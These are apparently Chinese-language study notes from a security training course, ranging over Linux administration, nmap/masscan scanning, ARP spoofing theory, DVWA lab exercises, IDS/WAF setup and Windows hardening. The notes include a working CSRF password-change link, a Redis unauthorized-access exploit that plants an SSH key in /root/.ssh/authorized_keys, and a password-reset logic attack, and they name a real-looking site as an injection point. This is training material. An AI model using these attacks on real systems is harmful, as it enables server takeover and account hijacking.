不要把自己的努力看的太重,毕竟大家都在努力
appscan
IBM security
#@eval不要报错,会把里面字符串当做木马执行
$_POST
$_POST[‘pw’]
get ,post
www.xxx.com/text.php?id=1
UserID项输入1则返回正常,如果加一个’,则报错,盲注中不会返回数值
sudo apt -get install git
git config --global user.name "Your name"
git config --global user.email
cd /
sudo mkidir test_git
sudo git init
ls -a
sudo vim lnnan.txt
cat lnnan.txt
git status
sudo git add xiaoye.txt
sudo git commit -m "xiaoye"
github是git仓库托管的神奇网站,github和git就可以通过ssh 通信,github开源优秀渗透工具
查看公钥文件内容,复制到github上
pentestdb
下载到本地
sudo git clone 地址
因为项目pentestd依赖lxm文件
ls -a
进入到目录中
cd .目录名字
查看目录下的文件
ll
创建用户
openvasmd --create-user=farmsec
修改密码
openvasmd --user=farmsec --new-password=123456
32IP 限制,可以在本机或服务器扫描了漏洞
32IP 限制
DVWA,一个渗透测试靶机,需要搭建LAMP环境,然后部署DVWA
1、没有验证码的时候可以暴力破解
2、SQL注入
3、完成密码(约等于SQL注入)
4、逻辑漏洞,任意密码重置,任意用户注册
5、四位数的短信验证码,30s内可以抓取3000个包
6、反馈过于详细
1、使用https,加密post包的密码
2、使用验证码
3、错误尝试5次后,锁定账户30分钟
4、高强度密码
吃了我的饭就是我的人
点击链接就会修改密码。
http://192.168.0.104/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&change=change
服务器为什么不处理?
cookie,链接都是对的,服务器处理请求,认为是一个合理的操作
是根据IP地址获取物理地址(MAC)的一个TCP/IP 协议。
IARP:MAC–》IP
主机A的Ip地址为192.168.1.1,MAC地址为OA-11-22-33-44-01
主机B的Ip地址为192.168.1.2.MAC地址是OA-11-22-33-44-02
当主机A和主机B进行通信时,地址解析协议可以将主机B的IP地址解析成主机B的MAC地址
第一步:根据主机A上的路由表内容,IP确定用于访问主机B 的转发IP地址是192.168.1.2,然后A主机在自己的本地ARP缓存中检查主机B的匹配MAC地址
第二步:如果主机A在ARP缓存中没有找到映射,它将询问192.168.1.2的硬件地址,从而将ARP请求帧广播到本地网络上的所有主机,源主机A的IP地址和MAC地址都包括在ARP请求中,本地网络上的每台主机都接受到ARP请求并且检查是否与自己的IP 地址匹配,如果主机发现请求的IP地址与自己的IP地址不匹配,它将丢弃ARP请求。
第三步:主机B确定ARP请求中IP地址与自己的IP地址匹配,则将主机A的IP地址和MAC地址映射添加在本地ARP缓存中。
第四步:主机B的将包含其MAC地址的ARP回复消息直接发送回主机A
第五步:当主机A收到从主机B发来的ARP回复消息的时候,会用主机B的IP地址和MAC地址映射更新ARP缓存,本地缓存是有生存期的,生存期结束之后,将重复上面的过程,主机B的MAC地址一旦确定,主机A就能向主机B发送IP通信了。
是用来存储IP地址和MAC地址的缓冲区,其本质就是一个IP地址–》MAC地址的对应表,表中每一个条目分别记录了网络上其他主机的IP地址和对应的MAC地址,每一个以太网或令牌环网络适配器都有自己单独的表,当地址解析协议被询问一个已知地址节点的MAC地址时,先在ARP缓存中查看,若存在,就直接返回与之对应的MAC地址,若不存在,才发送ARP请求向局域网查询。
在网络中发送虚假的ARP respones就是ARP欺骗,由于ARP协议是一种无状态协议,当收到一条ARP应答报文的时候,它就会更新ARP应答缓存表,不管它之前是否发送了ARP请求报文,ARP欺骗就是利用ARP协议的无状态性,通过捏造不存在的MAC地址更新操作系统ARP路由缓存表
注入点
http://vip.jiayuan.com/broker/tag=1
xss盲打
nmap和masscan
nmap
网络发现和安全审计的网络安全工具
主机发现
端口发现或枚举
服务发现
检测操作系统、硬件地址以及软件版本
nmap -p 22 192.168.0.1/24
TCP 扫描
nmap -sT 192.168.0.1
nmap -sU 192.168.0.1
主机扫描
nmap -sL 192.168.0.1/24
操作系统检测
nmap -O 192.168.0.1/24
扫描所有的
nmap -A -Pn 192.168.0.1/24
nmap --help
masscan
开源无状态扫描项目,支持应用层采用了异步传输的方式,不仅仅只是测试端口是否开放,它还能在完成TCP连接的同时获取目标应用程序到的banner信息
masscan -p 80 60.195.252.0/24 >>text.txt
cat test.tx
masscan -p 80 10.0.0.0/8 --banners
对于扫描较多的的地址用masscan速度很快
开源入侵检测snort
1设置网卡
本机设置两个网卡,虚拟机四个网口
2,导入发行版securityonion
3.下一步
根据入侵检测系统
1、基于主机
在主机上装一个插件
2、基于网络
检测网络流量
1.基于标志
有明显特征值
2、基于异常情况
centusos
安装
waf误报和漏报
modsecurity是一个入侵侦测和防护引擎,它主要是用于web应用程序,所以被称为 应用程序防火墙,可以作为apache web 服务器的模块或是单独的应用程序来运作
配置环境
安装包
启动apache
如果访问不了就说明起作用
1、处理误报,看日志
2、配置阀值的模式
介绍和物理管理
分级,分类分阶段
分为5级
1.自主保护
2、指导
3.监督检查
4强制监督检查
5专门监督检查
定级,对国家,社会和人民的威胁程度
是否是人为因素
对机房有二次防御,和其他报警器,防水,防火,防潮,防静电,有备用电,电磁防护,
介质管理
硬盘销毁
主机和数据库测评
windows
身份鉴别,口令复杂度,定期更换,登录失败多次账户锁定,访问控制,看是否有默认共享,最小授权,
安全审计
网络分为网络整体和网络设备
保证网络带宽满足需要
路由控制
检查网络拓扑
访问完整
入侵检测
安全审计
key值表明身份
1、ssh默认端口22
用nmap查看开启了哪些端口
vi /etc/ssh/sshd_config
看是否允许root登录
2、禁止ping
开启防火墙
查看iptables
3、使用sudo来限制用户权限
4、使用系统自带的日志
表示正确的和错误的都记录到日志
5、使用权限
6、安装denyhosts
列出目录文件下的详细信息 ls -l
列出目录下所有文件的详细信息 ls -alh
更换工作目录 cd
显示当前所在目录pwd
返回上级目录 cd …
返回上一次操作的目录 cd -
返回家目录cd ~
创建新的空目录mkdir dir-name
复制文件或目录 cp -r dir destination
删除空目录 mkdir dir-name
删除目录或文件 rm dir
删除全部 rm -rf*
移动 mv dir/file destination
重命名 mv dir/file-name newdir
看头几行 head file
看后头几行 tail file
反向查看 tac file
带行号查看 nl file
一页一页显示 more file
类似more,可以往前翻 less file
查看文件大小 du/du -h filename
减产文件所在磁盘的空间占用情况df/ df -h filename
命令 -h
man 命令
命令 --help
ps -aux |grep root
#|grep==检索
kill 进程ID /kill
三种模式
touch file新建一个文件
vi file 如果文件不存在,创建并编辑
输入:I A O
退出 :ESC
保存:按shift,出现一个:,wq保存退出
cat file 查看文件
cat /etc/passwd
增加组和用户/给用户指定组(组可以方便管理)
useradd username
userdel username
groupadd groupname
groupdel groupname
-l是返回详细信息
| 分割两条语句
查看组
cat /etc/group
查看组的最后修改时间
ls -al /etc/group
cat /etc/passwd| wc(用来做计算) -l(按照多少行来显示)
查看用户密码
cat /etc/shadow(显示密文)
查看指定用户密码
cat /etc/shadow |grep username
修改用户密码
passwd username
grep :检索查找
awk:文本分析工具
cat /etc/passwd|awk -F ‘:’ '{print $序号}'制定用:去切割
用户名 密码 UID GID 用户全名 home目录 shell 全部
1 2 3 4 5 6 7 (n)
cat /etc/passwd|awk -F ‘:’ ‘{print $1}’
只打印用户名
文件权限
4=read 2=write 1=excute
chmod 777 file (任何人可读可写)
递归更改权限
chmod -R 777 file
.当前路径
… 上一级目录
find 路径 内容
find -name file-name找文件
find path -user file-name 某路径下用户文件
find path -empty 查找空文件和 空目录
find /nouser 作废用户的文件
find path -perm 显示路径权限数为N的文件
find path -admin -minute 最后n分钟访问的文件
crontab -e 进入编辑模式,设定计划任务
分 时 日 月 周 命令
30 13 * * * touch 路径/111
ctrl+X退出
crontab -l 查看任务计划
按tab可以自动补全
rpm
rpm -qa 查看安装过的软件包
rpm -qa|grep 安装包名 把相关的包会列举出来
rpm -q 安装包名 查询某个安装包全名(列举主包)
rpm -ql 安装包名 查看安装包在哪个目录下写入文件,不跟后缀
rpm -qlp 安装包名 查看没有安装过的包会写入那些文件
rpm -af 文件路径 查看文件是由哪个包写入的
rpm -evh 软件名 卸载软件
yum install httpd
启动httpd
查看状态
启动
systemctl
systemctl start启动
systemctl restart重启
systemctl stop 停止
systemctl status 查看状态
systemctl enable 开机自动启动
-y 安装的时候可以做其他事情
yum -y install 软件包名 下载安装
yum -y localinstall 软件包名 安装软件
yum -y localinsatll *.rpm 本地批量安装
yum update 全部更新
yum update 包名 更新某个包
yum check-update 检查可更新的包
yum grouplist 列举系统中以组安装的包
yum remove 软件包名 卸载软件
yum groupremove 组名 删除程序包
yum deplist 包名 查看依赖关系
yum clean all 清楚全部缓存
yum makecache 更新源
yum list|grep 包名 查看有没有对应的包
dpkg -i 包名 安装软件
dpkg -L 软件全名 软件安装到什么地方
dpkg -l 软件全名 该安装包的版本
dpkg -r 软件名 删除软件但保留配置文件
dpkg -P 软件名 删除软件但清空配置文件
dpkg -s 软件全名 查看软件的详细信息
dpkg -c 安装包 查看安装该软件会在哪写入数据
apt-get update 更新源
apt-get upgrade 更新系统
apt-get install 包名 安装软件
apt-get remove 包名 删除软件
apt-cache search 某个关键字 搜索需要的软件包含在哪个包里
apt-get clean 清空缓存包
clear 清空屏幕
查看安装过的包 rpm -qa
查询某个安装包 rpm -q
安装包在哪个目录下写入文件 rpm -ql
查看没有安装过的包会写入那些文件 rpm -qlp dpkg -c
查看文件是由哪个包写入的 rpm -af
卸载软件 rpm -ech
下载安装 yum install apt-get install
更新包 yum update
检查可更新的包 yum check-update
卸载软件 yum remove apt-get remove
更新源 yum makecache apt-get update
cat 文件名|grep 要检索的字 检索关键字
cat 文件名|grep -v 要去除的字 检索去除了字的文本
cat 文件名|sort 文本排序 数字按照123,字母按照abc
cat 文件名|uniq 文本去重
cat 文件名 wc -l计算行数
旧的文本>>新的文本 文本重定向
diff 文本1 文本2 比较文本的差异
split -l 要分割成多少的个数 被分割的文本名字
通过使用ssh,可以把传输的数据进行加密,这样中间人的攻击方式就不可能实现了,而且也能够防止DNS欺骗和IP欺骗
使用SSH,传输的数据都是经过压缩的,所以可以加快传输的速度
SSH 由很多功能,它既可以代替Telnet,又可以为FTP,Pop,也可以为PPP提供一个安全的通道
备注:Telnet是明文传输,而ssh是加密传输
数据包欺骗
IP或主机欺骗
口令截获
网络嗅探
插入攻击
openssh的安装与状态(启动/停止)
oepnssh默认安装在centOs中,相关安装包可以通过下面命令进行查询
yum list|grep oepnssh
systemctl status/start/stop sshd.service
如果服务关闭,则会导致无法远程开启服务
远程连接服务器
ssh 192.168.0.200
备注:默认情况下,会使用本地的用户名连接对方的用户名,例如本地的root连接对面服务的root,如果两端用户名不一样,则需要使用-l username 指定用户名,输入正确密码后方可登录,同时变化的文件是/root/.ssh/known_hosts
在第一次登录的时候,oepnssh将会提示不知道这台登录的主机,只要输入YES,就会把这台主机的识别信息添加到known_hosts文件中,第二次登录的时候,则无需此步骤,但是如果出现错误,例如主机发生变化,则需要删除此内容,
scp 本地文件 username@host:服务器目录
将远程服务器上的文件复制到本机
scp username@host:文件名 本地目录
1、如果远程服务器防火墙由特殊限制,scp便要走特殊端口,具体用什么端口视情况而定,命令如下
scp -p 4588 username@host:/farmsec.text /home/
2、使用scp要注意所使用的用户是否具有可读取远程服务器相应文件的权限
SSH server的常规配置
ssh 的配置文件是/etc/ssh/sshd_config
修改SSH端口并配置root 无法登录
使用vi 打开配置文件,将port 22进行注释取消掉,并改为2222
设置好后,保存并退出,并重启SSH服务
这之后使用ssh连接服务器就需要使用2222端口,使用22端口就无法连接
SSH无密码登录需要使用公钥与私钥
客户机(192.168.0.115)服务器(192.168.0.200)
编辑服务器配置文件,开启私钥验证
取消掉配置文件中的注释
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedkeysFile .ssh/authorized_keys
随后重启服务
systemctl restart sshd
exit退出
cd .ssh
将秘钥文件拷贝至服务器,使用命令
ssh-copy-id username@host
随后客户机访问服务器,我们会发现直接无密码登录
而后我们修改配置文件,重新禁用root用户登录,则效果如下:
而如果我们使用另外一台主机登录,我们会发现可以通过密码的方式登录
我们可以修改配置文件中的passwordAuthentication no,可以禁止使用密码的方式
上面是用rsa算法的公钥/秘钥对,当然也可以用dsa,(对应的文件是id_dsa,id_dsa.pub)
日志文件为/var/log/secure
可以使用如下命令进行监控
tail -f /var/log/secure用于查看正在改变的日志
大家可以自由定制所想查看的日志,例如模拟登录失败观察日志的情况
漏洞简要说明与复现
Redis默认情况下,会绑定在0.0.0.0:6379,这样将会将Redis服务暴露在公网上
如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据
攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的/root/ssh文件夹的authotrized_keys文件中,进而可以直接登录目标服务器
docker的端口 2222 用20的端口是无法登录进去的
(echo -e“\n\n”;cat id_rsd.pub;echo -e“\n\n”)>1.txt
cat 1.txt |redis-cli -h 192.168.0.200 -p 6379 -x set key
OK
redis-cli -h 192.168.0.200
ping
config get*
更改备份文件保存的目录
config set dir /root/.ssh
设置保存的文件名
config set dbfilename “authorized_keys”
save
连接靶机端口2222
ssh 192.168.0.200 -p 2222
nginx 是一个高性能的http 和反向代理服务器,占用内存小并发能力强
1、启动epel
yum list|grep epel
epel-release.noarch
yum -y install epel.release
2、安装nginx
yum -y install nginx
3、启动nginx
systemctl start nginx.service
打开浏览器输入地址
cd /etc/nginx
ls
vi nginx.conf
配置lnmp网站
可以在VM,bare metal,openstack集群和其他的平台批量部署环境
优点
1、轻量型
2、docker的scale out是物理机和虚拟机不具备的,而且container相对于物理机和虚拟机管理更方便
3、封装细节,可以快速见到产品效果
4、多系统支持,开源
公开情报收集,为后续的渗透测试做准备
whois,真实ip,子域,端口,服务,关联度高的目标,备案,企业资料,历史漏洞,员工邮箱,
无法进行广泛研究,每一个逻辑漏洞都是唯一的
任意用户密码重置
1、使用自己的手机号接受验证码
攻击思路;首先来到忘记密码处,使用自己的手机号接受验证码,接受到验证码之后,再把受害人的手机号替换上,
2、把手机号修改为受害人的手机号,填入自己手机收到的验证码,单击下一步
3、进入修改密码,修改密码为123456qq
python 编写字典攻击脚本
思路:加载字典,利用reques.get/post,探测返回状态(status_code&content)进而判断是否攻击成功
python简单识别验证码
pytesseract 依赖于tesseract-ocr
python编写狗fuzz脚本
加载各种需要尝试的payload,requests.get/post,探测返回情况是佛福已经过狗
Python实现简单的网络嗅探
scapy是一个可用于网络嗅探的非常强大的第三方库,
实现一个简单的网络嗅探程序检测smurf攻击
Python数据分析
numpy,pandas,matplotlib
基于规则的waf/ida/ips的局限性
趋势-机器学习建立防御模型
如何用python进行渗透测试
默认用户名:pi 密码:respberry
启动root账户
sudo passwd root
输入两遍密码,如果提示password:password updated successfully则表示成功更改root密码,然后执行:
sudo passwd --unlock root
su并输入密码即可使用root用户
修改ssh配置启动root登录
sudo nano /etc/ssh/sshd_config
找PermitRootLogin without-password
改为PermitRootLogin yes
重启服务
sevice ssh restart
编辑/etc/apt/sources.list添加下面两行保存
deb http://mirrors.tuna.tsiinghua.edu.cn/raspbian/jessie main nonfree contrib
deb-src http://mirrors.tuna.tsinghua.edu.cn/raspbian/jessie main nonfree contrib
注释掉/etc/apt/sources.list.d/raspi.list里的内容
sudo apt update 更新源
sudo apt upgrade 更新软件包
树莓派三代,自带蓝牙和无线所以直接编辑wifi配置文件即可
编辑/etc/wpa_supplicant/wpa_supplicant.conf,添加
network={
ssid=“WIFI name”
psk=“wifi 密码”
}
保存即可
添加完之后重启网络来连接wifi
/etc/init.d/networking restart
固件更新
sudo rpi-update
如果提示找不到命令,需要安装rpi-update
sudo apt-get install rpi-update
OK ,等待固件更新完成,然后重启
修改/etc/dhcpcd.conf文件
sudo nano /etc/dhcpcd.conf
interface eth0
static ip_address=192.168.0.1
static domain_name_servers=192.168.0.1
interface wlan0
static_ip_address=192.168.0.200/24
static_routers=192.168.0.1
static_domain_name_servers=192.168.0.1
上面的配置文件中,eth0是有线配置,wlan0是无线配置
ip_address就是静态IP,后面要接/24
routers是网关
static domain_name_servers是DNS
Linux 4.9内核版本正式启用了这个功能
apt install screenfetch
用screenfetch工具查看内核版本是否升级成功
启用bbr
sudo sysctl net.ipv4.tcp_congestion_control=bbr
查看bbr是否加载
lsmod |grep bbr
备份SD卡
使用dd命令可以直接备份SD卡,这里树莓派的SD卡的路径是dev/sdc1和dev/sdc2,所以备份整个SD卡的路径就是/dev/sdc
sudo dd if=/dev/sdb|gzip>/home/netsfe/rasp/raspberry.gz
其中备份文件要保存的位置,文件名和SD卡的路径根据实际选择
将树莓派镜像还原
在Windows环境下,将备份文件解压,然后使用win32diskmager将备份文件写入到新的SD卡
树莓派项目推荐
linux 手册在线查询
https://jaywcjlove.github.io/linux-command/
是一种无线电通信技术,它基于软件定义的无线通信协议而非通过硬连线实现,频带,空中接口协议和功能可以通过软件下载和更新来实现软件升级,而不用完全更换硬件。
1、无线电可以毁灭互联网安全,信号干扰器及犯罪
2、监听GSM流量,GPS欺骗
3、收音机,电报台,发报台
4、WIFI嗅探
计算机相关犯罪:计算机外围参与的违法行为,例如传统的外围下注和盗窃
数字犯罪:表示未授权的访问,分发,操作,破坏,或崩溃电子存储数据的任何行为的术语
网络犯罪:通过因特网实施和推动的犯罪行为
盗窃元器件
盗打电话
盗版光碟
DDOS
蠕虫病毒
垃圾邮件
商业间谍
违禁品或非法材料的传播
伪基站
网络欺诈
恐怖主义
直接证据
情况证据
传闻证据
电子证据
网络证据
线缆:屏蔽线和非屏蔽线
交换机:ARP的记录
路由器/防火墙:路由表
DHCP/DNS/raduis:访问的记录
IDS/IPS:直接定位疑似的攻击源
web服务器的日志:记录
日志服务器:整体的集合,持久保存
EasyRecovery
finaldata
ssh服务
tail -f /var/log/secure
在web层面进行撞库,被发现的难度远远大于系统的层面
主要原因在于:web提供的日志不记录post请求的数据,现实情况中可能存在很多人通过NAT上网导致查到的IP相同
我们可以通过snort编写规则进行查找
Modsecurity的规则中存在针对扫描器特定的UserAgent的检测文件
通过Snort编写规则进行疑似的威胁查找,例如有人访问/admin.php
通过Web日志的顺序判断对方可能使用的扫描器
例如凌晨三点我们收到警报短信,我们起床后可以通过简单的查询日志可以判断对方的水平及被攻击成功率,
多个维度查看,例如扫描的链接顺序,payload(传输的实际数据)的类型,特定的useragent
试验:开启所有的扫描器针对特定页面进行攻击测试,同时观看日志分析扫描器的一些套路
403状态不用管
存储型XSS数据库中会有数据库
如果后台弹窗,可能会有盲打漏洞
反射性XSS需要观察日志,进行相应的替换测试(将js替换成弹窗)
系统CPU内存利用率
NTOP流量监测
快速切换抗D方案
后门调查
LInux木马经常被放置于/tmp目录
netstat -an
ps -aux
netstat -tlnp
查找可疑似的进程及文件
二进制初级
甲方:提出目标的一方
乙方:完成目标的乙方
产品实施工程师,技术支持工程师
渗透测试工程师、安全服务工程师、应急响应工程师
售前:售前工程师、安全顾问
Web+安卓+微信公众号+PC端测试
销售经理,大客户经理
确保组织业务能够持续,稳定运行
信息安全=网络安全
信息安全=防止信息泄露
信息安全=防黑客攻击
信息安全=找茬
信息安全=一次性
信息安全=技术可以完全解决
1、渗透测试中没有找到测试漏洞该怎么办?
httponly,点击劫持
2、挖到漏洞不是关键,注意报告输出质量
(怼开发,怼运维)
(目录,测试目标,对象,测试方法介绍)
(测试结果,漏洞细节描述,整改建议)
3、站在对方的立场上考虑问题
(漏洞整改要结合业务情况,不能为了安全而做安全)
1、网络逻辑漏洞,只需要分析用户需求
2、OWASP10漏洞
SQL 注入漏洞
XSS跨站漏洞
CSRF伪造漏洞
3、APP应用漏洞
代码混淆漏洞
DEX保护漏洞
so保护漏洞
调试测试漏洞
组件安全漏洞据安全漏洞
业务逻辑漏洞
4、日志安全审计
系统信息
查看系统版本ver
查看SP版本wmic os get ServicePackMajorVersion
查看Hotfix wmic qfe get hotfixid
查看主机名 hostname
查看网络配置 ipconfig/all
查看路由表 route print
查看开放端口 netset -ano
补丁安装
操作目的 安装系统补丁,修复漏洞
检查方法 使用nessus扫描漏洞,或安装微软安全基准分析器Microsoft Baseline Security Analyzer 扫描漏洞
加固方法 内网主机手动安装补丁或在内网搭建WSUS服务器,外网主机设置自动更新从微软官网软件下载补丁安装
回退方案 打补丁前做好业务或者系统备份,回退时恢复备份
如果是手工安装补丁,在安装前了解补丁是否影响业务,回退时在添加删除程序中删除相关补丁
备注 补丁安装后可能影响业务的稳定性
操作目的 减少系统无用账号,降低风险
检查方法 开始-》运行-》compmgmt.msc(计算机管理)-》本地用户和组,查看是否有不用的账号,系统账号所属组是否正确以及guest账号是否锁定
加固方法 使用net user 用户名/del 命令删除账号,使用net user 用户名/active:no 命令锁定账号
回退方法 使用net user 用户名 密码/add 命令添加账号 使用 net user 用户名/active:yes 命令激活账号
操作目的 增强口令的复杂度以及锁定策略等,降低被暴力破解的可能性
检查方法 开始-》运行-》secpol.msc(本地安全策略)–》安全设置
加固方法 账户设置 密码策略
账号密码必须符合复杂性要求-》启用
密码长度最小值:8个字符
密码最短使用期限:0天
密码最长使用期限:90天
强制密码历史:5个记住密码
远程关机
操作目的 只允许管理员组远程关机,降低风险
检查方法开始-》运行-》secpol.msc(本地安全策略)-》安全设置,在本地策略->用户权限分配 查看从远程系统强制关机设置是否只指派给Administrtors组
加固方法 开始-》运行-》secpol.msc(本地安全策略)-》安全设置,在本地策略->用户权限分配 查看关闭系统只指派给Administrtors组
本地关机
操作目的 只允许管理员组本地关机,降低风险
运行-》secpol.msc(本地安全策略)-》安全设置,在本地策略->用户权限分配 查看关闭系统只指派给Administrtors组
用户权限分配
操作目的 只允许管理员组拥有取得文件或其他对象所有权的权限,降低风险
授权用户登录
操作目的
允许授权的账号本地系统登录,减低风险
授权用户从网络访问
操作目的 允许授权账号从网络系统登录系统,降低风险
屏幕保护
操作目的 设置屏保,使本地攻击者无法直接恢复桌面控制
控制面板-》显示-》屏幕保护程序,设置等待时间为10分钟
远程连接挂起
操作目的 设置远程连接挂起时间,使远程攻击者无法直接恢复桌面控制
禁止系统自动登录
操作目的 系统休眠后重新激活,需要密码才能使用系统
隐藏最后登录名
注销后再次登录,不显示上次登录的用户名
关闭windows自动播放功能
网络服务
优化服务
关闭不需要的服务,减小风险
开始-》运行->service.msc
建议将以下服务停止,并将启动方式改为手动
Automatic Updates(不使用自动更新可以关闭)
Background Intelligent Transfer Service
DHCP Client
Messager
关闭共享
关闭默认共享
网络限制
网络访问限制
文件系统
使用NTFS
增强文件系统安全性
检查Everyone权限
增强Everyone权限
sql视频通关教程
限制命令权限
限制部分命令的权限
日志审核
增强日志
增大日志量大小,避免由于日志文件容量过小导致日志记录不全
增强审核
对系统事件进行审核,在日后出现故障进行排查
去哪搜集恶意样本?
分析DNS工具
安全运营数字化
sqli-lab攻略